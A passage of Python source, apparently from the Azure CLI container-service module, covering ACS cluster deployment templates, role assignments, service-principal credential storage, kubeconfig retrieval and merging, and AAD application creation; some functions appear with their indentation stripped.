            delete_role_assignments(cli_ctx,
                                    role=role,
                                    assignee=service_principal,
                                    scope=scope)
            break
        except CLIError:
            # User-facing errors are fatal; re-raise with the original
            # traceback (the original `raise ex` needlessly re-raised the
            # bound name).
            raise
        except CloudError as ex:
            logger.info(ex)
            time.sleep(delay + delay * x)
    else:
        return False
    hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
    logger.info('AAD role deletion done')
    return True
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
                             scope, assignee, role, include_inherited, include_groups):
    """List role assignments filtered by scope, assignee and/or role.

    :param include_inherited: also keep assignments whose stored scope
        regex-matches the queried scope (see the filter comprehension below).
    :param include_groups: when filtering by assignee, use the service-side
        "assignedTo" filter, which expands group membership.
    """
    assignee_object_id = None
    if assignee:
        assignee_object_id = _resolve_object_id(cli_ctx, assignee)
    # always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
    if scope:
        assignments = list(assignments_client.list_for_scope(
            scope=scope, filter='atScope()'))
    elif assignee_object_id:
        if include_groups:
            f = "assignedTo('{}')".format(assignee_object_id)
        else:
            f = "principalId eq '{}'".format(assignee_object_id)
        assignments = list(assignments_client.list(filter=f))
    else:
        assignments = list(assignments_client.list())
    if assignments:
        # NOTE: `and` binds tighter than `or` here, so an assignment is kept
        # when (a) no scope filter was given, or (b) inherited scopes are
        # allowed AND the assignment's scope is a regex prefix of the query
        # scope, or (c) the scopes match exactly (case-insensitive).
        assignments = [a for a in assignments if (
            not scope or
            include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
            _get_role_property(a, 'scope').lower() == scope.lower()
        )]
        if role:
            role_id = _resolve_role_id(role, scope, definitions_client)
            assignments = [i for i in assignments if _get_role_property(
                i, 'role_definition_id') == role_id]
        if assignee_object_id:
            assignments = [i for i in assignments if _get_role_property(
                i, 'principal_id') == assignee_object_id]
    return assignments
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub(
'[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
def list_acs_locations(cmd, client):
    """Return the ACS regions, grouped into production and preview."""
    locations = {}
    locations["productionRegions"] = regions_in_prod
    locations["previewRegions"] = regions_in_preview
    return locations
def _generate_windows_profile(windows, admin_username, admin_password):
if windows:
if not admin_password:
raise CLIError('--admin-password is required.')
if len(admin_password) < 6:
raise CLIError('--admin-password must be at least 6 characters')
windows_profile = {
"adminUsername": admin_username,
"adminPassword": admin_password,
}
return windows_profile
return None
def _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
                                  master_vm_size, master_osdisk_size, master_vnet_subnet_id,
                                  master_first_consecutive_static_ip, master_storage_profile):
    """Compose the masterProfile section, honoring a user-supplied override."""
    default_master_pool_profile = {
        "count": int(master_count),
        "dnsPrefix": dns_name_prefix + 'mgmt',
    }
    if api_version == "2017-07-01":
        # The 2017-07-01 surface exposes extra VM/network/storage knobs.
        default_master_pool_profile = _update_dict(default_master_pool_profile, {
            "count": int(master_count),
            "dnsPrefix": dns_name_prefix + 'mgmt',
            "vmSize": master_vm_size,
            "osDiskSizeGB": int(master_osdisk_size),
            "vnetSubnetID": master_vnet_subnet_id,
            "firstConsecutiveStaticIP": master_first_consecutive_static_ip,
            "storageProfile": master_storage_profile,
        })
    if master_profile:
        return _update_dict(default_master_pool_profile, master_profile)
    return default_master_pool_profile
def _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
                                  agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
                                  agent_ports, agent_storage_profile):
    """Compose agentPoolProfiles: one default pool, or one per user profile."""
    default_agent_pool_profile = {
        "count": int(agent_count),
        "vmSize": agent_vm_size,
        "osType": os_type,
        "dnsPrefix": dns_name_prefix + 'agent',
    }
    if api_version == "2017-07-01":
        # The 2017-07-01 surface exposes extra VM/network/storage knobs.
        default_agent_pool_profile = _update_dict(default_agent_pool_profile, {
            "count": int(agent_count),
            "vmSize": agent_vm_size,
            "osDiskSizeGB": int(agent_osdisk_size),
            "osType": os_type,
            "dnsPrefix": dns_name_prefix + 'agent',
            "vnetSubnetID": agent_vnet_subnet_id,
            "ports": agent_ports,
            "storageProfile": agent_storage_profile,
        })
    if agent_profiles is None:
        return [_update_dict(default_agent_pool_profile, {"name": "agentpool0"})]
    # Honor the user-specified profiles; derive a unique dnsPrefix per pool
    # from its index unless the profile already provides one.
    pools = []
    for idx, profile in enumerate(agent_profiles):
        merged = _update_dict(
            {"dnsPrefix": dns_name_prefix + 'agent' + str(idx)}, profile)
        pools.append(_update_dict(default_agent_pool_profile, merged))
    return pools
def _generate_outputs(name, orchestrator_type, admin_username):
# define outputs
outputs = {
"masterFQDN": {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).masterProfile.fqdn]".format(name) # pylint: disable=line-too-long
},
"sshMaster0": {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 22')]".format(admin_username, name) # pylint: disable=line-too-long
},
}
if orchestrator_type.lower() != "kubernetes":
outputs["agentFQDN"] = {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).agentPoolProfiles[0].fqdn]".format(name) # pylint: disable=line-too-long
}
# override sshMaster0 for non-kubernetes scenarios
outputs["sshMaster0"] = {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 2200')]".format(admin_username, name) # pylint: disable=line-too-long
}
return outputs
def _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile):
properties = {
"orchestratorProfile": {
"orchestratorType": orchestrator_type,
},
"masterProfile": master_pool_profile,
"agentPoolProfiles": agent_pool_profiles,
"linuxProfile": {
"ssh": {
"publicKeys": [
{
"keyData": ssh_key_value
}
]
},
"adminUsername": admin_username
},
}
if api_version == "2017-07-01":
properties["orchestratorProfile"]["orchestratorVersion"] = orchestrator_version
if windows_profile is not None:
properties["windowsProfile"] = windows_profile
return properties
def _get_user_assigned_identity_resource_id_regular_expression():
return re.compile(
r'/subscriptions/(.*?)/resourcegroups/(.*?)/providers/microsoft.managedidentity/userassignedidentities/(.*)',
flags=re.IGNORECASE)
def _get_user_assigned_identity(cli_ctx, resource_id):
    """Resolve a user-assigned identity resource id to its identity object.

    :raises InvalidArgumentValueError: when the resource id does not parse.
    :raises ResourceNotFoundError: when the identity does not exist.
    :raises ClientRequestError: on any other service-side failure.
    """
    resource_id = resource_id.lower()
    pattern = _get_user_assigned_identity_resource_id_regular_expression()
    match = pattern.search(resource_id)
    if not match:
        raise InvalidArgumentValueError(
            "Cannot parse identity name from provided resource id {}.".format(resource_id))
    subscription_id = match.group(1)
    resource_group_name = match.group(2)
    identity_name = match.group(3)
    msi_client = get_msi_client(cli_ctx, subscription_id)
    try:
        return msi_client.user_assigned_identities.get(resource_group_name=resource_group_name,
                                                       resource_name=identity_name)
    except CloudError as ex:
        if 'was not found' in ex.message:
            raise ResourceNotFoundError("Identity {} not found.".format(resource_id))
        raise ClientRequestError(ex.message)
def _get_user_assigned_identity_client_id(cli_ctx, resource_id):
    """Return the client id of the identity at *resource_id*."""
    identity = _get_user_assigned_identity(cli_ctx, resource_id)
    return identity.client_id
def _get_user_assigned_identity_object_id(cli_ctx, resource_id):
    """Return the principal (object) id of the identity at *resource_id*."""
    identity = _get_user_assigned_identity(cli_ctx, resource_id)
    return identity.principal_id
# pylint: disable=too-many-locals
def acs_create(cmd, client, resource_group_name, deployment_name, name, ssh_key_value, dns_name_prefix=None,
               location=None, admin_username="azureuser", api_version=None, master_profile=None,
               master_vm_size="Standard_D2_v2", master_osdisk_size=0, master_count=1, master_vnet_subnet_id="",
               master_first_consecutive_static_ip="10.240.255.5", master_storage_profile="",
               agent_profiles=None, agent_vm_size="Standard_D2_v2", agent_osdisk_size=0,
               agent_count=3, agent_vnet_subnet_id="", agent_ports=None, agent_storage_profile="",
               orchestrator_type="DCOS", orchestrator_version="", service_principal=None, client_secret=None, tags=None,
               windows=False, admin_password="", generate_ssh_keys=False,  # pylint: disable=unused-argument
               validate=False, no_wait=False):
    """Create a new Acs.
    :param resource_group_name: The name of the resource group. The name
     is case insensitive.
    :type resource_group_name: str
    :param deployment_name: The name of the deployment.
    :type deployment_name: str
    :param dns_name_prefix: Sets the Domain name prefix for the cluster.
     The concatenation of the domain name and the regionalized DNS zone
     make up the fully qualified domain name associated with the public
     IP address.
    :type dns_name_prefix: str
    :param name: Resource name for the container service.
    :type name: str
    :param ssh_key_value: Configure all linux machines with the SSH RSA
     public key string. Your key should include three parts, for example
     'ssh-rsa AAAAB...snip...UcyupgH azureuser@linuxvm
    :type ssh_key_value: str
    :param content_version: If included it must match the ContentVersion
     in the template.
    :type content_version: str
    :param admin_username: User name for the Linux Virtual Machines.
    :type admin_username: str
    :param api_version: ACS API version to use
    :type api_version: str
    :param master_profile: MasterProfile used to describe master pool
    :type master_profile: dict
    :param master_vm_size: The size of master pool Virtual Machine
    :type master_vm_size: str
    :param master_osdisk_size: The osDisk size in GB of master pool Virtual Machine
    :type master_osdisk_size: int
    :param master_count: The number of masters for the cluster.
    :type master_count: int
    :param master_vnet_subnet_id: The vnet subnet id for master pool
    :type master_vnet_subnet_id: str
    :param master_storage_profile: The storage profile used for master pool.
     Possible value could be StorageAccount, ManagedDisk.
    :type master_storage_profile: str
    :param agent_profiles: AgentPoolProfiles used to describe agent pools
    :type agent_profiles: dict
    :param agent_vm_size: The size of the Virtual Machine.
    :type agent_vm_size: str
    :param agent_osdisk_size: The osDisk size in GB of agent pool Virtual Machine
    :type agent_osdisk_size: int
    :param agent_vnet_subnet_id: The vnet subnet id for master pool
    :type agent_vnet_subnet_id: str
    :param agent_ports: the ports exposed on the agent pool
    :type agent_ports: list
    :param agent_storage_profile: The storage profile used for agent pool.
     Possible value could be StorageAccount, ManagedDisk.
    :type agent_storage_profile: str
    :param location: Location for VM resources.
    :type location: str
    :param orchestrator_type: The type of orchestrator used to manage the
     applications on the cluster.
    :type orchestrator_type: str or :class:`orchestratorType
     <Default.models.orchestratorType>`
    :param tags: Tags object.
    :type tags: object
    :param windows: If true, the cluster will be built for running Windows container.
    :type windows: bool
    :param admin_password: The adminstration password for Windows nodes. Only available if --windows=true
    :type admin_password: str
    :param bool raw: returns the direct response alongside the
     deserialized response
    :rtype:
    :class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
     instance that returns :class:`DeploymentExtended
     <Default.models.DeploymentExtended>`
    :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
     if raw=true
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    if ssh_key_value is not None and not is_valid_ssh_rsa_public_key(ssh_key_value):
        raise CLIError(
            'Provided ssh key ({}) is invalid or non-existent'.format(ssh_key_value))
    subscription_id = get_subscription_id(cmd.cli_ctx)
    if not dns_name_prefix:
        dns_name_prefix = _get_default_dns_prefix(
            name, resource_group_name, subscription_id)
    rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
    if location is None:
        location = rg_location
    # if api-version is not specified, or specified in a version not supported
    # override based on location
    if api_version is None or api_version not in ["2017-01-31", "2017-07-01"]:
        if location in regions_in_preview:
            api_version = "2017-07-01"  # 2017-07-01 supported in the preview locations
        else:
            api_version = "2017-01-31"  # 2017-01-31 applied to other locations
    if orchestrator_type.lower() == 'kubernetes':
        # Kubernetes clusters need a service principal; create/reuse one.
        principal_obj = _ensure_service_principal(cmd.cli_ctx, service_principal, client_secret, subscription_id,
                                                  dns_name_prefix, location, name)
        client_secret = principal_obj.get("client_secret")
        service_principal = principal_obj.get("service_principal")
    elif windows:
        raise CLIError('--windows is only supported for Kubernetes clusters')
    # set location if void
    if not location:
        location = '[resourceGroup().location]'
    # set os_type
    os_type = 'Linux'
    if windows:
        os_type = 'Windows'
    # set agent_ports if void
    if not agent_ports:
        agent_ports = []
    # get windows_profile
    windows_profile = _generate_windows_profile(
        windows, admin_username, admin_password)
    # The resources.properties fields should match with ContainerServices' api model
    master_pool_profile = _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
                                                        master_vm_size, master_osdisk_size, master_vnet_subnet_id,
                                                        master_first_consecutive_static_ip, master_storage_profile)
    agent_pool_profiles = _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
                                                        agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
                                                        agent_ports, agent_storage_profile)
    outputs = _generate_outputs(name, orchestrator_type, admin_username)
    properties = _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
                                      agent_pool_profiles, ssh_key_value, admin_username, windows_profile)
    # Assemble the ARM deployment: one ContainerService resource plus outputs.
    resource = {
        "apiVersion": api_version,
        "location": location,
        "type": "Microsoft.ContainerService/containerServices",
        "name": name,
        "tags": tags,
        "properties": properties,
    }
    template = {
        "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
        "contentVersion": "1.0.0.0",
        "resources": [
            resource,
        ],
        "outputs": outputs,
    }
    params = {}
    if service_principal is not None and client_secret is not None:
        # Pass the secret as a secureString template parameter so it never
        # appears in the template body itself.
        properties["servicePrincipalProfile"] = {
            "clientId": service_principal,
            "secret": "[parameters('clientSecret')]",
        }
        template["parameters"] = {
            "clientSecret": {
                "type": "secureString",
                "metadata": {
                    "description": "The client secret for the service principal"
                }
            }
        }
        params = {
            "clientSecret": {
                "value": client_secret
            }
        }
    # Due to SPN replication latency, we do a few retries here
    max_retry = 30
    retry_exception = Exception(None)
    for _ in range(0, max_retry):
        try:
            return _invoke_deployment(cmd, resource_group_name, deployment_name,
                                      template, params, validate, no_wait)
        except CloudError as ex:
            retry_exception = ex
            # Only retry on errors that look like SPN propagation delays.
            if 'is not valid according to the validation procedure' in ex.message or \
               'The credentials in ServicePrincipalProfile were invalid' in ex.message or \
               'not found in Active Directory tenant' in ex.message:
                time.sleep(3)
            else:
                raise ex
    raise retry_exception
def store_acs_service_principal(subscription_id, client_secret, service_principal,
                                file_name='acsServicePrincipal.json'):
    """Persist service principal credentials for *subscription_id*.

    The entry is merged into the JSON store (one entry per subscription) and
    the file is rewritten with owner-only (0600) permissions.
    """
    entry = {}
    if client_secret:
        entry['client_secret'] = client_secret
    if service_principal:
        entry['service_principal'] = service_principal

    config_path = os.path.join(get_config_dir(), file_name)
    all_principals = load_service_principals(config_path=config_path) or {}
    all_principals[subscription_id] = entry

    # os.open with mode 0o600 keeps the secret readable/writable by the owner only.
    flags = os.O_RDWR | os.O_CREAT | os.O_TRUNC
    with os.fdopen(os.open(config_path, flags, 0o600), 'w+') as sp_file:
        json.dump(all_principals, sp_file)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
    """Return the stored service principal entry for *subscription_id*, or None."""
    config_path = os.path.join(get_config_dir(), file_name)
    config = load_service_principals(config_path)
    return config.get(subscription_id) if config else None
def load_service_principals(config_path):
    """Best-effort read of the service principal store at *config_path*.

    Returns the parsed JSON content, or None when the file is missing or
    cannot be read/parsed (callers treat None as "no stored principals").
    """
    if not os.path.exists(config_path):
        return None
    handle = os.open(config_path, os.O_RDONLY)
    try:
        with os.fdopen(handle) as config_file:
            return shell_safe_json_parse(config_file.read())
    except:  # pylint: disable=bare-except
        # Deliberate best-effort: any parse/read failure means "no data".
        return None
def _invoke_deployment(cmd, resource_group_name, deployment_name, template, parameters, validate, no_wait,
                       subscription_id=None):
    """Create — or, when *validate* is set, only validate — an ARM deployment."""
    DeploymentProperties = cmd.get_models(
        'DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
    Deployment = cmd.get_models(
        'Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
    deployment = Deployment(properties=DeploymentProperties(
        template=template, parameters=parameters, mode='incremental'))

    deployments_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES,
                                                 subscription_id=subscription_id).deployments

    if validate:
        logger.info('==== BEGIN TEMPLATE ====')
        logger.info(json.dumps(template, indent=2))
        logger.info('==== END TEMPLATE ====')
        # Newer resource API versions expose validation as a long-running operation.
        if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
            validation_poller = deployments_client.begin_validate(
                resource_group_name, deployment_name, deployment)
            return LongRunningOperation(cmd.cli_ctx)(validation_poller)
        return deployments_client.validate(resource_group_name, deployment_name, deployment)

    return sdk_no_wait(no_wait, deployments_client.begin_create_or_update,
                       resource_group_name, deployment_name, deployment)
def k8s_get_credentials(cmd, client, name, resource_group_name,
                        path=os.path.join(os.path.expanduser(
                            '~'), '.kube', 'config'),
                        ssh_key_file=None,
                        overwrite_existing=False):
    """Download and install kubectl credentials from the cluster master
    :param name: The name of the cluster.
    :type name: str
    :param resource_group_name: The name of the resource group.
    :type resource_group_name: str
    :param path: Where to install the kubectl config file
    :type path: str
    :param ssh_key_file: Path to an SSH key file to use
    :type ssh_key_file: str
    """
    cluster_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
    _k8s_get_credentials_internal(name, cluster_info, path,
                                  ssh_key_file, overwrite_existing)
def _k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing):
    """Copy the kubeconfig from the cluster master over SSH and merge it into *path*."""
    if ssh_key_file is not None and not os.path.isfile(ssh_key_file):
        raise CLIError(
            'Private key file {} does not exist'.format(ssh_key_file))

    dns_prefix = acs_info.master_profile.dns_prefix  # pylint: disable=no-member
    location = acs_info.location  # pylint: disable=no-member
    user = acs_info.linux_profile.admin_username  # pylint: disable=no-member
    _mkdir_p(os.path.dirname(path))

    # Never clobber an existing file: find the first free "<path>-<name>-<ix>".
    path_candidate = path
    ix = 0
    while os.path.exists(path_candidate):
        ix += 1
        path_candidate = '{}-{}-{}'.format(path, name, ix)

    # TODO: this only works for public cloud, need other casing for national clouds
    host = '{}.{}.cloudapp.azure.com'.format(dns_prefix, location)
    acs_client.secure_copy(user, host, '.kube/config',
                           path_candidate, key_filename=ssh_key_file)

    # If we had to download to an alternate file, merge it into the requested one.
    if path_candidate != path:
        try:
            merge_kubernetes_configurations(
                path, path_candidate, overwrite_existing)
        except yaml.YAMLError as exc:
            logger.warning(
                'Failed to merge credentials to kube config file: %s', exc)
            logger.warning(
                'The credentials have been saved to %s', path_candidate)
def _handle_merge(existing, addition, key, replace):
if not addition.get(key, False):
return
if not existing.get(key):
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if not i.get('name', False) or not j.get('name', False):
continue
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
overwrite = False
try:
overwrite = prompt_y_n(msg.format(i['name']))
except NoTTYException:
pass
if overwrite:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in {} in your kubeconfig file.'
raise CLIError(msg.format(i['name'], key))
existing[key].append(i)
def load_kubernetes_configuration(filename):
    """Read and parse the kubeconfig file *filename*.

    :raises CLIError: if the file is missing or contains invalid YAML.
    """
    try:
        with open(filename) as config_stream:
            return yaml.safe_load(config_stream)
    except (yaml.parser.ParserError, UnicodeDecodeError) as exc:
        raise CLIError('Error parsing {} ({})'.format(filename, str(exc)))
    except (IOError, OSError) as exc:
        # Only a missing file gets the friendly message; other OS errors bubble up.
        if getattr(exc, 'errno', 0) == errno.ENOENT:
            raise CLIError('{} does not exist'.format(filename))
        raise
def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None):
    """Merge the kubeconfig in *addition_file* into *existing_file*.

    :param existing_file: path of the kubeconfig to merge into (rewritten in place).
    :param addition_file: path of the freshly downloaded kubeconfig.
    :param replace: overwrite conflicting entries without prompting.
    :param context_name: optional name to give the added context/cluster.
    :raises CLIError: when addition_file yields no data or entries conflict.
    """
    existing = load_kubernetes_configuration(existing_file)
    addition = load_kubernetes_configuration(addition_file)

    # Validate before dereferencing: the original only checked this after
    # already indexing into `addition`, so a load failure surfaced as a bare
    # TypeError/AttributeError instead of the intended CLIError.
    if addition is None:
        raise CLIError(
            'failed to load additional configuration from {}'.format(addition_file))

    if context_name is not None:
        addition['contexts'][0]['name'] = context_name
        addition['contexts'][0]['context']['cluster'] = context_name
        addition['clusters'][0]['name'] = context_name
        addition['current-context'] = context_name

    # rename the admin context so it doesn't overwrite the user context
    for ctx in addition.get('contexts', []):
        try:
            if ctx['context']['user'].startswith('clusterAdmin'):
                admin_name = ctx['name'] + '-admin'
                addition['current-context'] = ctx['name'] = admin_name
                break
        except (KeyError, TypeError):
            continue

    if existing is None:
        existing = addition
    else:
        _handle_merge(existing, addition, 'clusters', replace)
        _handle_merge(existing, addition, 'users', replace)
        _handle_merge(existing, addition, 'contexts', replace)
        existing['current-context'] = addition['current-context']

    # check that ~/.kube/config is only read- and writable by its owner
    if platform.system() != 'Windows':
        existing_file_perms = "{:o}".format(
            stat.S_IMODE(os.lstat(existing_file).st_mode))
        if not existing_file_perms.endswith('600'):
            logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
                           existing_file, existing_file_perms)

    with open(existing_file, 'w+') as stream:
        yaml.safe_dump(existing, stream, default_flow_style=False)

    current_context = addition.get('current-context', 'UNKNOWN')
    msg = 'Merged "{}" as current context in {}'.format(
        current_context, existing_file)
    print(msg)
def _get_host_name(acs_info):
"""
Gets the FQDN from the acs_info object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info is None:
raise CLIError('Missing acs_info')
if acs_info.master_profile is None:
raise CLIError('Missing master_profile')
if acs_info.master_profile.fqdn is None:
raise CLIError('Missing fqdn')
return acs_info.master_profile.fqdn
def _get_username(acs_info):
"""
Gets the admin user name from the Linux profile of the ContainerService object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info.linux_profile is not None:
return acs_info.linux_profile.admin_username
return None
def _get_acs_info(cli_ctx, name, resource_group_name):
    """Fetch the ContainerService object from the Azure REST API.

    :param name: ACS resource name
    :type name: String
    :param resource_group_name: Resource group name
    :type resource_group_name: String
    """
    services_client = cf_container_services(cli_ctx, None)
    return services_client.get(resource_group_name, name)
def _rand_str(n):
"""
Gets a random string
"""
choices = string.ascii_lowercase + string.digits
return ''.join(random.SystemRandom().choice(choices) for _ in range(n))
def _mkdir_p(path):
# http://stackoverflow.com/a/600612
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def update_acs(cmd, client, resource_group_name, container_service_name, new_agent_count):
    """Scale the first agent pool of an ACS cluster to *new_agent_count*.

    Returns the poller of the resulting create-or-update operation.
    """
    instance = client.get(resource_group_name, container_service_name)
    instance.agent_pool_profiles[0].count = new_agent_count  # pylint: disable=no-member
    # null out the service principal because otherwise validation complains
    if instance.orchestrator_profile.orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes:
        instance.service_principal_profile = None
    # null out the windows profile so that validation doesn't complain about not having the admin password
    instance.windows_profile = None
    return client.begin_create_or_update(resource_group_name, container_service_name, instance)
def list_container_services(cmd, client, resource_group_name=None):
    ''' List Container Services. '''
    # Scope the listing to a resource group when one is given.
    if resource_group_name:
        svc_list = client.list_by_resource_group(resource_group_name=resource_group_name)
    else:
        svc_list = client.list()
    return list(svc_list)
def show_service_principal(client, identifier):
    """Return the service principal identified by SPN or object id."""
    return client.get(_resolve_service_principal(client, identifier))
def _resolve_service_principal(client, identifier):
# todo: confirm with graph team that a service principal name must be unique
result = list(client.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(identifier)))
if result:
return result[0].object_id
try:
uuid.UUID(identifier)
return identifier # assume an object id
except ValueError:
raise CLIError(
"service principal '{}' doesn't exist".format(identifier))
def create_application(client, display_name, homepage, identifier_uris,
                       available_to_other_tenants=False, password=None, reply_urls=None,
                       key_value=None, key_type=None, key_usage=None, start_date=None,
                       end_date=None, required_resource_accesses=None):
    """Register an AAD application; returns (application, ocp-aad-session-key).

    :raises CLIError: when the signed-in user lacks directory permissions.
    """
    from azure.graphrbac.models import GraphErrorException
    password_creds, key_creds = _build_application_creds(password, key_value, key_type,
                                                         key_usage, start_date, end_date)
    create_params = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
                                                display_name=display_name,
                                                identifier_uris=identifier_uris,
                                                homepage=homepage,
                                                reply_urls=reply_urls,
                                                key_credentials=key_creds,
                                                password_credentials=password_creds,
                                                required_resource_access=required_resource_accesses)
    try:
        result = client.create(create_params, raw=True)
        return result.output, result.response.headers["ocp-aad-session-key"]
    except GraphErrorException as ex:
        # Translate the common "insufficient privileges" failure into guidance.
        if 'insufficient privileges' in str(ex).lower():
            link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal'  # pylint: disable=line-too-long
            raise CLIError("Directory permission is needed for the current user to register the application. "
                           "For how to configure, please refer '{}'. Original error: {}".format(link, ex))
        raise
def update_application(client, object_id, display_name, homepage, identifier_uris,
                       available_to_other_tenants=False, password=None, reply_urls=None,
                       key_value=None, key_type=None, key_usage=None, start_date=None,
                       end_date=None, required_resource_accesses=None):
    """Update credentials and reply URLs of an existing AAD application.

    :raises CLIError: when the signed-in user lacks directory permissions.
    """
    from azure.graphrbac.models import GraphErrorException
    password_creds, key_creds = _build_application_creds(password, key_value, key_type,
                                                         key_usage, start_date, end_date)
    try:
        # Only the pieces that were actually supplied are patched.
        if key_creds:
            client.update_key_credentials(object_id, key_creds)
        if password_creds:
            client.update_password_credentials(object_id, password_creds)
        if reply_urls:
            client.patch(object_id, ApplicationUpdateParameters(
                reply_urls=reply_urls))
        return
    except GraphErrorException as ex:
        # Translate the common "insufficient privileges" failure into guidance.
        if 'insufficient privileges' in str(ex).lower():
            link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal'  # pylint: disable=line-too-long
            raise CLIError("Directory permission is needed for the current user to register the application. "
                           "For how to configure, please refer '{}'. Original error: {}".format(link, ex))
        raise
def _build_application_creds(password=None, key_value=None, key_type=None,
                             key_usage=None, start_date=None, end_date=None):
    """Build (password_credentials, key_credentials) for an AAD application.

    At most one of *password* / *key_value* may be supplied.  Dates default
    to now .. now + 1 year and may be passed as ISO strings.
    :raises CLIError: when both a password and a key value are given.
    """
    if password and key_value:
        raise CLIError(
            'specify either --password or --key-value, but not both.')

    if not start_date:
        start_date = datetime.datetime.utcnow()
    elif isinstance(start_date, str):
        start_date = dateutil.parser.parse(start_date)

    if not end_date:
        end_date = start_date + relativedelta(years=1)
    elif isinstance(end_date, str):
        end_date = dateutil.parser.parse(end_date)

    key_type = key_type or 'AsymmetricX509Cert'
    key_usage = key_usage or 'Verify'

    password_creds, key_creds = None, None
    if password:
        password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
                                             key_id=str(uuid.uuid4()), value=password)]
    elif key_value:
        key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
                                   key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
    return (password_creds, key_creds)
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
    """Create a service principal for an application.

    *identifier* may be an app id, an identifier URI, or an object id; when
    *resolve_app* is False it is used as the app id verbatim.
    """
    if rbac_client is None:
        rbac_client = get_graph_rbac_management_client(cli_ctx)

    if not resolve_app:
        app_id = identifier
    else:
        try:
            uuid.UUID(identifier)
            result = list(rbac_client.applications.list(
                filter="appId eq '{}'".format(identifier)))
        except ValueError:
            result = list(rbac_client.applications.list(
                filter="identifierUris/any(s:s eq '{}')".format(identifier)))
        if not result:  # assume we get an object id
            result = [rbac_client.applications.get(identifier)]
        app_id = result[0].app_id

    return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def create_role_assignment(cli_ctx, role, assignee, is_service_principal, resource_group_name=None, scope=None):
    """Assign *role* to *assignee* at the given scope (or resource group)."""
    return _create_role_assignment(cli_ctx, role, assignee,
                                   resource_group_name=resource_group_name,
                                   scope=scope, resolve_assignee=is_service_principal)
def _create_role_assignment(cli_ctx, role, assignee,
                            resource_group_name=None, scope=None, resolve_assignee=True):
    """Create a role assignment, resolving role name and assignee first."""
    from azure.cli.core.profiles import get_sdk
    factory = get_auth_management_client(cli_ctx, scope)
    assignments_client = factory.role_assignments
    definitions_client = factory.role_definitions

    scope = _build_role_scope(
        resource_group_name, scope, assignments_client.config.subscription_id)
    role_id = _resolve_role_id(role, scope, definitions_client)

    # If the cluster has service principal resolve the service principal client id to get the object id,
    # if not use MSI object id.
    if resolve_assignee:
        object_id = _resolve_object_id(cli_ctx, assignee)
    else:
        object_id = assignee

    RoleAssignmentCreateParameters = get_sdk(cli_ctx, ResourceType.MGMT_AUTHORIZATION,
                                             'RoleAssignmentCreateParameters', mod='models',
                                             operation_group='role_assignments')
    parameters = RoleAssignmentCreateParameters(
        role_definition_id=role_id, principal_id=object_id)

    # TODO: track2/remove custom headers, depends on 'azure.mgmt.authorization'
    return assignments_client.create(scope, uuid.uuid4(), parameters, custom_headers=None)
def _build_role_scope(resource_group_name, scope, subscription_id):
subscription_scope = '/subscriptions/' + subscription_id
if scope:
